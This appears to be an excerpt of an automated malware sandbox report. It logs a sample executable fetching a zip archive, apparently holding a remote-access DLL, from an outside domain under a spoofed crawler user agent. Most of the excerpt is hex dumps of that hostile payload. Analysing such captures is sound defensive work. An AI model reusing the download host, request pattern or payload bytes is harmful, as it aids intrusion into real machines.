                                                                                                                            Cache-Control: no-cache
                                                                                                                            Mar 21, 2023 08:00:12.650962114 CET4284INHTTP/1.1 200 OK
                                                                                                                            Cache-Control: private
                                                                                                                            Content-Type: text/html; Charset=utf-8
                                                                                                                            Server: Microsoft-IIS/10.0
                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                            Set-Cookie: ASPSESSIONIDSSSDBBAR=GFHFJJEABHAOAJOACAOJFOMP; path=/
                                                                                                                            X-Powered-By: ASP.NET
                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                            Date: Tue, 21 Mar 2023 07:00:12 GMT
                                                                                                                            Content-Length: 15
                                                                                                                            Data Raw: 34 37 2e 31 37 37 32 2c 38 2e 34 32 37 31 39
                                                                                                                            Data Ascii: 47.1772,8.42719


                                                                                                                            HTTPS Proxied Packets

                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                            0192.168.2.449695198.54.121.245443C:\Users\user\Desktop\0ud2VlMOvF.exe
                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                            2023-03-21 07:00:04 UTC0OUTGET /nesup3.zip HTTP/1.1
                                                                                                                            User-Agent: YahooBot
                                                                                                                            Host: mediainfotv.xyz
                                                                                                                            2023-03-21 07:00:04 UTC0INHTTP/1.1 200 OK
                                                                                                                            keep-alive: timeout=5, max=100
                                                                                                                            content-type: application/zip
                                                                                                                            last-modified: Fri, 10 Mar 2023 09:52:45 GMT
                                                                                                                            accept-ranges: bytes
                                                                                                                            content-length: 2265919
                                                                                                                            date: Tue, 21 Mar 2023 07:00:04 GMT
                                                                                                                            server: LiteSpeed
                                                                                                                            x-turbo-charged-by: LiteSpeed
                                                                                                                            connection: close
                                                                                                                            2023-03-21 07:00:05 UTC0INData Raw: 50 4b 03 04 14 00 00 00 08 00 7b 58 87 49 eb 70 f3 0e fb 91 02 00 78 01 05 00 0b 00 00 00 48 54 43 54 4c 33 32 2e 44 4c 4c ec 3a 6d 70 14 55 b6 dd 33 3d 49 27 19 e8 c6 0d 8a 4a 99 58 ea 7b c8 b8 11 69 5e 3d 20 89 06 61 92 a0 04 66 12 32 b3 7e 4c 06 14 35 e6 f9 b1 62 b7 c8 3e 22 93 ed c4 9a ce 4d bb bc 12 6b 51 b7 a0 58 dc 2d ab 76 6b c5 5a 6b 8c 88 71 26 93 4d 02 8a 22 56 49 00 4b 50 57 ed 18 1e 22 44 18 64 4c bf 73 6f f7 7c 25 13 70 77 d6 7f af ab 92 db e7 de f3 7d cf 39 f7 a3 a7 ee ce 4d 94 95 a2 28 06 fe 74 9d a2 ba 29 e3 a9 a2 2e fe 1c 83 bf a9 25 bb a6 52 af 15 ec bb ba 9b 5e b6 ef ea 95 cd 0f 3e 5e fa cb b5 8f 3e b0 76 f5 c3 a5 f7 ae 7e e4 91 47 c5 d2 7b ee 2b 5d 2b 3d 52 fa e0 23 a5 4b 56 34 94 3e fc e8 9a fb ca a6 4c 29 bc d6 e4 d1 5d 3a fa db f8
                                                                                                                            Data Ascii: PK{XIpxHTCTL32.DLL:mpU3=I'JX{i^= af2~L5b>"MkQX-vkZkq&M"VIKPW"DdLso|%pw}9M(t).%R^>^>v~G{+]+=R#KV4>L)]:
                                                                                                                            2023-03-21 07:00:05 UTC16INData Raw: 25 71 0a 00 37 1f e5 f2 72 ea e0 1c 47 6b 60 b0 3c 75 30 c9 5f 51 e0 f2 d2 84 7a c6 ba ac 91 74 41 85 41 68 1e 28 7a 24 0b c0 f7 66 c8 a5 13 30 19 0c 2f 72 39 c8 0f 87 38 67 d3 eb 7e d9 45 1f 58 d2 b2 2f 7e 7d 89 24 9b 51 f7 5b bb 0f 2e 57 b7 fa 27 b3 8d 46 08 9d 95 a9 9e 57 6d 8a 32 36 12 7d 7a c8 31 0e a0 19 fd af 46 e9 af 01 7a d2 39 fd fa 65 7d 4f e6 fb 72 9f c3 70 aa d9 a7 f1 2d b8 51 8f 8b fc 34 82 96 f2 cc 9a e0 e2 8c 21 82 7f f4 92 f3 60 aa 9f 7f 19 f1 67 8c 92 c7 2a 4d 6f c1 0d 7c 28 c5 e1 26 71 14 91 44 40 71 5b 22 ae f7 18 7b 60 f1 3b 24 79 37 4b 73 87 13 ab d5 db ed 5d ae 45 ab 4b 5c da f2 ee cf 77 1a 0c 9d f6 97 16 79 f5 2c 26 88 f5 a7 3c f8 60 af 59 0e 65 a1 cf f9 04 fc cc c1 cf 29 e8 7f 7e 37 7e 9f 8d df ef 83 cf d5 12 fb cc 9e 3c 24 70 85
                                                                                                                            Data Ascii: %q7rGk`<u0_QztAAh(z$f0/r98g~EX/~}$Q[.W'FWm26}z1Fz9e}Orp-Q4!`g*Mo|(&qD@q["{`;$y7Ks]EK\wy,&<`Ye)~7~<$p
                                                                                                                            2023-03-21 07:00:05 UTC32INData Raw: 05 0e 62 15 2a 0b db 11 cc ac a7 e4 76 0d 6c 01 00 54 23 c0 97 25 f1 15 85 2b a0 a2 c7 01 60 33 02 d4 77 02 78 15 01 ca 00 60 13 02 fc 2e 0a 60 41 80 10 00 38 9f 92 36 62 ee 33 b1 e2 be 5e 05 22 ad ba 1e ad 38 b2 f3 69 69 03 02 cc d1 15 a7 1b fa aa 0c b3 54 5a 8f b9 79 fa dc a5 5a ee b3 d2 1a cc 1d a5 cf 7d 44 cb fd 95 b4 0a 73 2d fa dc 19 5a ee f3 d2 4a cc fd ba 58 97 9b a1 e5 be 24 ad c0 dc 46 7d 6e 7f 2d f7 37 aa 44 fe 4b b1 4e 22 3b 8b 75 12 b9 a9 1d 24 f2 e6 c0 93 d9 ab 6f 53 d5 af 19 ff a3 64 ce f9 f7 92 b9 3a ba ff 5d c6 24 f3 14 78 b0 2a 96 16 5a 76 09 c9 bc f9 c7 48 e6 14 4b 77 92 39 fd ca 4b 4a e6 cf af 32 08 fa f8 92 60 de de e5 ed e2 a7 ab 2c 8a 5e dc 0c 8b 60 87 be fe 23 ee 7d 18 33 ea f1 f3 11 5b e7 f3 11 88 08 13 e6 c7 18 6e 4a bf 80 43 8c
                                                                                                                            Data Ascii: b*vlT#%+`3wx`.`A86b3^"8iiTZyZ}Ds-ZJX$F}n-7DKN";u$oSd:]$x*ZvHKw9KJ2`,^`#}3[nJC
                                                                                                                            2023-03-21 07:00:05 UTC48INData Raw: 11 60 02 5f 97 cc 2c 8e 9f 7f 68 3f 33 e3 94 b3 be 79 be f6 94 6d c9 17 91 27 a1 bb 0f 5a 2b e0 8e 5f ed 29 f3 a8 77 ad 5b f7 b0 5d d4 9c da 4f cc 73 7a bf cb c6 5d c3 4f 8e 06 3f 1d 3e 87 d8 0b 37 31 e6 9c 93 69 9b 61 7d f3 7d e3 d1 39 07 77 59 df bc 30 27 74 d6 7f 15 39 18 07 20 82 de 0f 30 07 19 0c 03 7e 97 01 05 de 22 b5 b5 d4 cc 76 67 d6 ad bb 78 45 99 b5 73 6a 3f 65 bc f1 6e ef 5a b0 25 86 03 89 b8 ed 2a e9 ce be c9 88 5f 37 e1 73 b0 30 c7 7e 8f d5 ff ce 37 57 1f ca 7f c0 76 ee ba 45 07 86 db 6a 2f 24 a9 a7 65 a1 3d 8b 2c 0f ed 81 f3 50 b9 cf a2 03 31 f8 b5 ad 70 ee d5 02 ee ab 32 04 b9 f5 78 a5 16 b0 58 1d 1f 0d 91 eb db a0 d5 fc d4 51 db bd 4f 34 19 f8 1e de 3f f4 ff 63 ed 69 a3 9b aa b2 bd 49 6e cb 05 6e 4d d0 d4 76 f9 31 ea 38 6b 96 1a f9 d0 a0
                                                                                                                            Data Ascii: `_,h?3ym'Z+_)w[]Osz]O?>71ia}}9wY0't9 0~"vgxEsj?enZ%*_7s0~7WvEj/$e=,P1p2xXQO4?ciInnMv18k
                                                                                                                            2023-03-21 07:00:05 UTC64INData Raw: e8 37 6b eb 6d c1 a5 51 bf 75 f1 22 54 45 a9 36 c1 6a 46 5b 4f 48 b3 05 4b 51 f8 cc c6 75 13 1a 30 c2 c3 b3 7d 9e a8 98 2c ec 2b 3b 0b 3d 71 58 93 8e 66 59 97 7c c7 fa 0b cb f5 a6 93 0b db 89 27 a0 3e 6f b0 f4 69 f9 ec d8 cd 23 88 66 30 34 a1 09 0e 81 5c 59 59 a9 53 10 4d fe e3 be 80 b0 2f 31 58 fa 6a 31 c6 b5 ca a1 2c 61 5f 4a f0 81 57 e7 c8 1a 7e 36 65 a1 7a a8 bb 49 fc 60 55 4e d3 ca 18 e9 9d 40 7a 3c ac 66 47 70 5d 4e 4e 0c ae 60 a7 8a b0 96 a3 91 ff fc f2 1e 93 29 af aa 0f a9 18 45 2a e2 9d d0 6d 91 6d 3e ee d1 20 9b 35 0d 44 7d f0 1e a4 78 9f e9 a2 b8 8b 91 fe a8 ae 3f cc 57 ce ca 34 44 3b 72 43 ce 87 80 ac cd 85 a7 e4 5e 76 95 0d 3d a3 23 f2 f4 99 41 16 93 9c c5 b8 f9 ef 8e 8a ef e5 44 81 71 e9 19 97 45 91 46 2b 0d 22 b9 42 f9 09 48 26 e9 aa 7c 8f
                                                                                                                            Data Ascii: 7kmQu"TE6jF[OHKQu0},+;=qXfY|'>oi#f04\YYSM/1Xj1,a_JW~6ezI`UN@z<fGp]NN`)E*mm> 5D}x?W4D;rC^v=#ADqEF+"BH&|
                                                                                                                            2023-03-21 07:00:05 UTC80INData Raw: 1e 77 0f 44 8e a6 d5 8c 96 43 4e 2f 3b ba 9a ee d4 6e 2f e5 f1 ab 9a c9 bc 78 96 97 27 19 48 41 35 77 37 6d 98 54 48 05 66 6c 5f ed d0 b6 69 5a 4e 13 54 94 32 fa d1 2a 4a ce d3 ee 8e 4b 5b 66 c7 2c cf a6 d5 8c d2 d3 10 92 77 7f 3d fa 20 7b 45 d5 ce 1d 13 9c 6b 34 32 50 8e e6 78 94 75 d9 ce 20 fc e5 74 94 fb 2a 48 14 ba c1 d3 e7 7a dd ab dc c5 34 09 77 de f5 ae a1 78 a2 41 4f 17 b7 5b dc ac 96 75 ad 51 52 f1 b5 72 15 f7 a9 bf c8 28 45 4d c2 cb d0 a9 ea 6d 36 eb 5f 5c 8e 5c f6 af 1f 82 e0 71 9b 43 2d b1 d3 77 f8 6f 3f 1c ec c1 38 76 d6 4a 6a ea 1b ed ae e9 88 43 85 9a d8 e2 d1 4c ad 1e dc 9d 33 05 1f 74 f2 4c 17 da ac 6f b9 1c 79 ec 09 cc 74 a1 03 58 03 ff 6e f8 21 59 d2 ee 29 b2 ad d5 b7 f9 ca 9c c1 a5 4c 29 ef 53 97 a3 29 70 a5 ec 14 f0 6a 71 15 c8 d4 41
                                                                                                                            Data Ascii: wDCN/;n/x'HA5w7mTHfl_iZNT2*JK[f,w= {Ek42Pxu t*Hz4wxAO[uQRr(EMm6_\\qC-wo?8vJjCL3tLoytXn!Y)L)S)pjqA
                                                                                                                            2023-03-21 07:00:05 UTC96INData Raw: e3 b1 1f 8b 96 56 5d 82 b8 29 b1 fa bc de 10 23 2e 79 99 4d 40 d2 7e a4 be 9b 73 54 78 d1 be 16 1d be 51 86 03 a4 7c 07 49 f9 c6 aa 01 52 be 62 f0 9d 40 db 96 89 20 7e d6 82 0c 6a 95 d2 76 e6 d1 ae 1c fd 28 a9 fc 83 3d b6 2a 26 ac 2c 68 d0 b5 8e 63 9c ae 20 6e 1b 6f d1 c0 c0 a3 3d 23 a5 2a 9a 5f 95 29 0d e3 b6 fe 8b 6c 8a 27 53 9d 8e d7 56 f0 12 64 56 39 4e 1d c2 8e 10 1a 6b b1 bd ce 65 1b 29 53 7b 97 56 62 b8 53 b3 ad b6 60 bb d6 85 97 c7 a6 05 e7 cd b2 17 a2 5f a5 cd a3 98 df 07 95 7f cd dd 2c 66 b6 9a 8e 1c 81 c5 cb 08 2f 5b 35 16 78 3c 80 92 5b 4d 7f fb 1b 8a d1 76 e2 ff 7f 0a da 66 79 fd a6 72 76 e5 38 92 c1 2b f4 d9 0a 6d 47 66 52 47 1f 01 ad ee 2d c7 cd d9 f4 a9 24 13 44 cb 19 9b 44 db 4b 95 c1 bb 4e 21 63 29 eb 73 fd 99 6d ba 72 c0 f5 f9 29 27 39
                                                                                                                            Data Ascii: V])#.yM@~sTxQ|IRb@ ~jv(=*&,hc no=#*_)l'SVdV9Nke)S{VbS`_,f/[5x<[Mvfyrv8+mGfRG-$DDKN!c)smr)'9
                                                                                                                            2023-03-21 07:00:05 UTC112INData Raw: 30 b0 63 1c 11 89 cd 7c 88 31 ee 20 95 36 40 c5 97 12 d6 b6 b1 76 62 76 5c 41 8a 46 e3 b4 8b 63 ba 00 10 8f 02 4f a8 6d c6 8b d3 e4 c9 78 c7 88 08 d9 40 15 81 4a 38 d3 43 c2 55 73 4e 23 92 af 97 b3 e9 83 a0 13 c6 54 be c0 cb 12 16 19 4e d0 ab 2d cc 7d b7 d6 81 93 36 20 6a a1 69 d2 4a 4a 23 eb e9 6a aa 0b 8b a7 ef 41 6d e8 9f 52 d9 6b 19 67 d8 bf 14 47 f9 22 1c c2 d1 09 6a 82 d3 92 7c a6 fd 07 32 bc a6 39 0e 37 a5 76 c7 0d 64 a2 d0 77 b2 d6 25 68 b7 cb 4c 0f 89 79 5a 12 46 5d ed b9 26 54 52 47 93 af 71 c4 c9 39 ef 82 08 7f df 25 61 74 86 79 c8 7b 41 53 38 74 79 f1 15 c6 0d 9b f9 44 c8 31 d4 67 6d 8c 9c 1d 68 e2 f6 53 88 70 f5 78 18 96 04 ed 1d 7d 3b d4 bd 90 a7 03 35 b8 a3 25 3e c1 e7 81 8f c9 d8 1f 1a 77 b8 7f 50 c1 30 7f f9 92 c1 20 45 e2 4f 1f 0a 41 55
                                                                                                                            Data Ascii: 0c|1 6@vbv\AFcOmx@J8CUsN#TN-}6 jiJJ#jAmRkgG"j|297vdw%hLyZF]&TRGq9%aty{AS8tyD1gmhSpx};5%>wP0 EOAU
                                                                                                                            2023-03-21 07:00:05 UTC128INData Raw: 1e 08 00 f5 49 a0 9e 89 1b 9f 8e 88 70 95 d3 97 de 3b 65 32 5d 01 18 c1 e7 ad 1d e1 32 84 9f 2d da 37 98 4c bf 34 be 38 8c 26 6a c3 33 33 d8 f3 20 e4 a1 15 0f 0e 3c b4 e6 f3 e1 68 13 57 c8 fb 49 f8 72 8d b3 61 ec f3 70 02 f9 b2 3c 17 c1 db 8a 84 87 ec 93 b6 bc 5f b3 28 92 e7 90 30 d3 97 92 67 e3 e0 5f d0 f8 e0 10 59 e8 84 b0 f0 89 93 22 22 a3 a2 e5 93 a7 c4 c4 c6 c5 27 4c 9d 36 5d 31 27 39 45 99 9a a6 52 a7 cf cd c8 d4 64 65 cf cb c9 65 b4 f3 f3 f2 17 2c f4 1e 3a cc 67 f8 88 91 a3 46 fb 0e 1c 12 00 34 92 93 55 d1 5a 46 3a 36 40 0a 6f 09 59 80 47 48 76 ee 42 f0 23 64 8e 22 57 39 72 f8 e0 e4 ec 6c 62 f9 7b c7 bb 75 de 20 45 db bf 77 4d 76 7c af f3 a1 cc d6 2b eb d2 b3 47 7c 96 5c b3 71 4d ca ba 61 25 57 da 7e 5a 76 75 81 7b cd f9 aa 92 4b 67 de 1d 18 b1 c3
                                                                                                                            Data Ascii: Ip;e2]2-7L48&j33 <hWIrap<_(0g_Y""'L6]1'9ERdee,:gF4UZF:6@oYGHvB#d"W9rlb{u EwMv|+G|\qMa%W~Zvu{Kg
                                                                                                                            2023-03-21 07:00:05 UTC144INData Raw: 9e 8d b9 fe 05 7f 5f 72 9d 98 78 6b 67 0a eb 9a 28 19 5f d5 61 ac 74 c7 cd bf 65 7f 7e fd d5 c6 8e d1 19 57 4e 45 1f 7b 3c be 6e fc 91 ed bb d3 ef 76 f7 8b 56 b6 ea f1 4b d0 ba 05 ee 17 8f 44 16 bf 9e 3e 61 52 b5 7c ce d2 80 fb 1b e6 9c 0c ed 5b 3a 63 bd ae a4 61 e3 8e 23 07 2a 7a 77 5c f2 16 73 4c ed bc ac 68 42 f1 0f 6f c5 93 fd 33 1c 3f 0a eb fc 0d f3 fd 1c 57 d2 f6 b5 5e 03 4a c7 4f fd f3 df 38 97 b1 75 df 74 57 64 8f eb f5 56 6d 8e 4f d0 e2 b7 4b ef dd 49 ba 70 c5 af 67 c6 b4 51 d7 0b 66 33 7f 1f fb e2 7e 71 a0 66 58 de 89 a2 c2 d6 9f af 93 d7 77 8e bb 78 97 1d f1 ee 25 c5 57 5f a8 bf 3c e8 e0 f2 53 c3 d7 c2 e9 57 7f 76 2e 1c bc 30 64 5d d1 70 59 45 ab b4 f3 4f 8f ae 73 6f 7b f6 4a ee 95 5f 4a e2 24 0b 2e 27 a5 05 06 a7 dd 52 0e 3f f4 d3 c5 d1 63 e7
                                                                                                                            Data Ascii: _rxkg(_ate~WNE{<nvVKD>aR|[:ca#*zw\sLhBo3?W^JO8utWdVmOKIpgQf3~qfXwx%W_<SWv.0d]pYEOso{J_J$.'R?c
                                                                                                                            2023-03-21 07:00:05 UTC160INData Raw: 29 73 02 7d cb 4c 33 5d ea 9f 71 69 b6 c0 bc c5 a3 16 b3 e7 2c 98 fd f2 8b c9 75 75 6f af c5 01 92 f3 96 17 83 af b4 1d 79 64 7d ca 53 b4 e8 ce ab 6c b5 5b 47 b3 aa d4 e4 84 26 17 06 6d 9c 5f c3 af a0 e2 64 55 03 a8 5e ed ca d4 37 28 f5 95 be 24 ea 35 30 b2 43 36 29 d6 37 9e 87 c5 5b 2f b1 96 d6 df 5e b8 76 5f 2f b7 8e 53 a4 13 d7 50 3d dd 09 16 46 36 46 d6 d3 87 34 27 87 bc 21 d7 cc de 66 b5 68 55 b1 d9 fb 5a f4 e0 0c 7d 0e eb d5 d0 6a bf 19 19 19 1a 98 14 22 73 dd b1 95 ee d8 00 69 90 8d ee a8 a1 ee c8 1c 99 99 98 36 33 81 f2 ae 62 68 8a 5a e8 5e 77 32 12 11 94 4f 16 9d 45 a6 e3 ef 25 19 1a 1b f9 7b 49 7a fe 5d 21 7a 84 c6 46 22 fa c7 f5 b4 5a a3 26 a8 31 6a f8 e3 18 69 d3 eb 7c bf 5c 74 68 5c cc ef d7 fb 97 56 33 d4 d5 c3 6e d2 d5 cb 6b 6a f2 cd a0 65
                                                                                                                            Data Ascii: )s}L3]qi,uuoyd}Sl[G&m_dU^7($50C6)7[/^v_/SP=F6F4'!fhUZ}j"si63bhZ^w2OE%{Iz]!zF"Z&1ji|\th\V3nkje
                                                                                                                            2023-03-21 07:00:05 UTC176INData Raw: 83 f2 40 08 7c 06 be 07 c2 5c a2 e6 60 08 58 0d f8 79 98 2b a0 0b 78 17 4c 03 2b c1 7e 10 3b 1f f3 03 b4 06 3e 30 0e 2c 05 c7 80 f4 35 e6 23 68 08 5e 07 53 c0 6f e0 32 78 e4 1b f4 07 68 0d 42 60 38 58 0f 62 16 a0 5f 40 6b 90 09 fa 80 b1 e0 57 70 df 42 f4 3b 70 83 71 60 17 b8 00 1e fc 16 ed 05 ed 41 0f f0 21 98 0b 7e 02 27 00 bf 08 6b 10 34 01 61 30 07 ac 02 67 41 99 c5 98 07 a0 3d c8 05 73 80 fc 2d d6 2e 70 00 1c 05 67 c0 25 70 1d f0 df 61 cd 82 e2 a0 14 a8 00 2a 81 1a a0 1e 48 04 cd 41 07 e0 00 b9 60 08 18 05 be 04 f3 c1 f7 60 03 d8 0a ce 80 eb c0 b2 04 75 04 8f 83 2a e0 45 d0 0a 64 81 30 78 0f 4c 06 df 83 9d e0 77 f0 0f b8 6f 29 d6 13 a8 09 9a 82 d7 40 1f 30 16 2c 00 1b c1 1e f0 07 b8 00 6e 82 fb bf c7 7a 03 55 41 43 d0 16 64 83 de 60 04 98 0c 16 81 fd
                                                                                                                            Data Ascii: @|\`Xy+xL+~;>0,5#h^So2xhB`8Xb_@kWpB;pq`A!~'k4a0gA=s-.pg%pa*HA``u*Ed0xLwo)@0,nzUACd`
                                                                                                                            2023-03-21 07:00:05 UTC192INData Raw: 16 00 12 92 06 cd 87 f0 d9 b8 98 21 ba d8 08 c1 72 e8 17 10 2a 43 e5 75 0d b8 ab 2e c3 40 01 9a 19 20 e8 f9 fe 42 aa 8e cf d0 41 04 3c e3 8b 35 90 8c cf d0 0b 99 f3 21 24 b3 98 cf d2 09 fd cd fd 9a ef af 76 d1 9c f9 45 c8 28 43 67 0e 1f 6d 45 ef dd 0d 80 3a 32 f4 ed a9 25 5a a7 97 cd 2c d1 42 ae 1a ff 0e 15 3f 14 3f b4 e3 7d f5 7c 8e 67 76 7e 7e 82 d1 03 7f 89 cd 70 88 27 07 f6 3b 2d 9d a6 ff f2 96 16 1b 3f 4f 94 9c 01 c1 d2 59 6f e9 ec c2 0a 58 02 1e 4b ab 7c 90 af 15 ac 2d a6 2f c4 70 3c 2b ad 85 cd c5 dc 0f 93 d2 dc ac 0f 23 a9 0b b5 e2 f7 10 1f f7 ab ad 4f c1 d6 e7 d5 87 6c 92 a4 b9 d9 bb 90 50 28 4a b1 e8 69 f7 ab 50 fd 5d 94 46 f1 b2 cf 82 97 de 69 d1 0b fd e2 30 c3 9d ba 34 7a a7 d5 30 b2 a6 51 d9 1b 27 7c 82 fb 84 9d e6 5e 35 43 03 9c 7a ec ca 4b
                                                                                                                            Data Ascii: !r*Cu.@ BA<5!$vE(CgmE:2%Z,B??}|gv~~p';-?OYoXK|-/p<+#OlP(JiP]Fi04z0Q'|^5CzK
                                                                                                                            2023-03-21 07:00:05 UTC208INData Raw: db 47 f0 41 39 f8 57 08 fe b5 8f e0 6d 72 f0 39 08 3e 77 95 6a 78 8c 58 8d 56 73 76 ab 5a 8d d6 3e 32 7a 4c ce e8 3c 04 9f ef 23 38 53 0e c6 d4 bf f5 11 fc 17 39 f8 02 04 5f b8 4a 35 22 48 35 da cc d9 6d cc 12 88 d6 06 d1 db fa c8 e9 3b 9a e4 f4 3b 44 f9 bd 8f 60 af 1c dc 0e c1 ed 7d 04 bf 2e 07 77 40 70 c7 55 ea b1 9c c6 7a 04 cc d9 01 b5 3b 02 7d 64 34 43 ce e8 22 04 5f ec 23 38 45 0e be 04 c1 97 fa 08 be 5e 0e be 0c c1 97 af 52 8d 8e fe 58 8d 4e 73 76 27 b3 54 ae 46 67 68 cc e9 90 d1 11 e7 dd 90 c9 15 08 ba f2 c7 20 40 00 25 5d 10 d4 05 41 83 7b 04 31 91 c2 5e df 86 fe 58 83 54 89 de 31 45 4a ac a1 dd 6b fa e3 3d 7c e8 be 57 6b 3c 93 a2 24 df b2 fe 84 e4 77 92 5a fc 60 ce fe 41 ed 8c 1f fa 68 ce 03 24 b3 92 96 ab ac e7 d1 fd ff 74 3d f7 eb df 63 3d f7
                                                                                                                            Data Ascii: GA9Wmr9>wjxXVsvZ>2zL<#8S9_J5"H5m;;D`}.w@pUz;}d4C"_#8E^RXNsv'TFgh @%]A{1^XT1EJk=|Wk<$wZ`Ah$t=c=
                                                                                                                            2023-03-21 07:00:05 UTC224INData Raw: dc 49 0f 68 64 5d bf af 21 6e 26 33 2b 93 e6 8e 77 a0 7c ed 47 c4 51 01 b1 f5 37 59 7d eb 06 67 1b 27 31 06 34 70 68 69 45 7b 87 96 36 6c 90 78 12 db 80 2e 94 76 2c c4 a9 66 6d 55 70 60 1b 21 94 90 4e 7a 74 fe 9c c5 8b e3 a9 e2 f5 90 a9 ff ed f5 eb 17 33 8b 9c 8f 32 f1 ea 41 cb 80 27 90 d5 1b 7f d1 50 c2 00 f6 92 44 bb 97 81 13 ce 4c eb 18 04 4d 2d d7 09 03 30 4b 23 ec 1a 90 25 19 15 b2 55 da d2 ed 3c 39 d0 88 1f 90 73 98 af f3 82 c2 9e 25 8d 36 35 c2 b8 25 eb 69 f7 f9 73 1a 2a c5 6a c4 27 16 80 a6 99 0f be b2 e4 7c da bd ee 1c 6a fb e2 de 12 b0 cb 86 31 85 0c 5d 7e 7e e1 db 28 05 84 89 02 c1 6f 53 f1 e8 7c fd 1c 32 b0 3a 85 dc 00 a9 07 54 42 19 83 ec 6c 65 98 90 36 c3 59 b6 32 0a 66 d9 dd cb f4 b8 64 13 d1 0d 24 f0 48 54 37 73 c6 e6 48 72 51 c4 ac bc 47
                                                                                                                            Data Ascii: Ihd]!n&3+w|GQ7Y}g'14phiE{6lx.v,fmUp`!Nzt32A'PDLM-0K#%U<9s%65%is*j'|j1]~~(oS|2:TBle6Y2fd$HT7sHrQG
                                                                                                                            2023-03-21 07:00:05 UTC224INData Raw: 6d 3c 60 83 9f 7f 21 32 3c 62 83 9e 10 cf 8d b5 c5 93 60 95 09 11 c2 12 9d 3c d1 61 c6 ca 6b 8e 74 73 f9 01 94 65 f3 ce 36 31 45 56 fb f4 55 b6 05 05 fb d3 d5 f1 b4 2b 6b a5 21 cf 44 ce 19 58 a8 23 82 9c d2 dc 2f 68 f1 da a5 dc 3a d3 11 e8 8c 0d 7b 6f 70 b6 d2 7b 9a f8 d2 96 fb d9 ef 13 d9 bd 83 13 bf 31 1d b9 c1 29 f2 b9 67 04 d8 c6 80 c4 35 87 91 3b ce 87 b4 78 0e 80 73 dc 4a 3c 05 a7 50 4c a4 d2 35 ec e5 11 f4 6a bb 0e 67 8a d1 8e 38 da 8b af a8 78 79 cb 49 3c df 5a 9a 71 3c 11 9b 1b 50 2c 53 7a 86 42 0b 6c d6 66 58 85 70 e8 a3 b9 7f 85 69 89 1d 87 2f e1 db 5e 6b a4 b9 08 c8 89 20 88 c3 62 c7 a1 cd 1a a1 56 7e ad 81 6d 36 8c 87 83 c7 7e 9d 96 22 53 a6 5f 38 3a 34 ce 34 d3 91 8f b1 57 d0 1c cf 60 58 12 29 83 69 ee c6 7c a2 97 9b 02 b9 3d 1c 4e de ba 88
                                                                                                                            Data Ascii: m<`!2<b`<aktse61EVU+k!DX#/h:{op{1)g5;xsJ<PL5jg8xyI<Zq<P,SzBlfXpi/^k bV~m6~"S_8:44W`X)i|=N
                                                                                                                            2023-03-21 07:00:05 UTC240INData Raw: f0 2b 61 1b ac e3 09 60 9d ea eb cb 5b f9 33 fd 69 e5 0f 3a 8c 73 2c 67 5f 0e 92 18 07 74 b7 a7 49 c0 28 23 17 50 2b 85 91 53 a9 c5 bf 1a c6 8c b4 56 8a 80 2f 67 7d a4 04 d9 48 8f 48 8e 6c 6c 7d 0d 67 c3 22 32 5d d6 bc 4e 57 78 2e d7 76 05 6a 90 a4 82 37 ce c3 a1 e8 3d 29 a5 ab 90 95 2a fe 81 ca 44 6a 1a c4 70 46 d6 b2 56 d3 ad 16 4a 63 49 78 7f 2b 69 93 20 ee ba 32 1d 4e d8 57 30 84 e4 bf e2 82 ea e1 cd 4f df fc 07 9c fd 17 0f af 4b 38 df 7b db 96 85 db 4f 12 45 3a 86 a1 0d 1d b4 8e 33 28 8c b2 3a eb ec c3 04 9c b1 91 41 b4 97 0f 6a f0 99 b3 38 42 6d 29 80 5f c4 3b cd 2b bc 04 64 1e e6 7a 59 b3 47 a3 49 c0 a1 3f ea b3 28 32 48 97 41 cf 22 8d a6 41 39 6a 12 36 17 45 1a e3 0d fa af 42 69 17 f9 57 58 6a 04 87 09 68 c0 61 34 20 aa 6f 90 e7 d4 43 93 4e 51 8d
                                                                                                                            Data Ascii: +a`[3i:s,g_tI(#P+SV/g}HHll}g"2]NWx.vj7=)*DjpFVJcIx+i 2NW0OK8{OE:3(:Aj8Bm)_;+dzYGI?(2HA"A9j6EBiWXjha4 oCNQ
                                                                                                                            2023-03-21 07:00:05 UTC256INData Raw: ab 22 32 aa 61 9b 03 6f 9a 17 11 2b e1 f5 59 1a b3 22 12 3e 6f f2 a2 c6 8d 8b 48 57 d3 23 e9 16 0d 8b c8 ce 73 c4 b7 75 fd 22 72 e7 4b 8a 55 b3 7a d0 af c8 fd ce 06 3a 45 a4 f0 56 f1 e4 c2 1f 85 a4 c2 7e d1 99 0b e5 85 c4 de cc d8 7e 4c 51 21 e9 b0 e1 fd 98 b4 77 85 c4 e5 e4 fe 37 2d 5e 16 92 ca 8b 92 3b c3 1f 16 92 20 73 cb 4f 9e b7 0b c9 19 5d 5d 1b 71 72 21 69 d3 5b 18 a4 b9 58 48 12 83 8f 2e db 7d aa 90 34 eb 76 71 64 f3 c3 85 44 f2 7e d2 5f f3 76 15 92 7e 7b 9b c7 ec dd 58 48 f6 74 3a 73 f1 84 a2 90 6c f4 1a 6a ba 65 79 21 79 ef 24 0e 1d 27 2b 24 fe 13 24 aa 8a a0 42 d2 c5 6f 68 ca ef fe 85 a4 c1 c8 55 53 6f 8c 2d 24 27 46 c8 82 bf 8c 28 24 43 7c 93 ae 7f 27 85 24 9f f1 e9 f7 d2 ae 90 b4 7c e7 b9 7b 7b 97 42 f2 db 60 c3 7b 36 ad 0b 49 47 a7 2f bb e2
                                                                                                                            Data Ascii: "2ao+Y">oHW#su"rKUz:EV~~LQ!w7-^; sO]]qr!i[XH.}4vqdD~_v~{XHt:sljey!y$'+$$BohUSo-$'F($C|'$|{{B`{6IG/
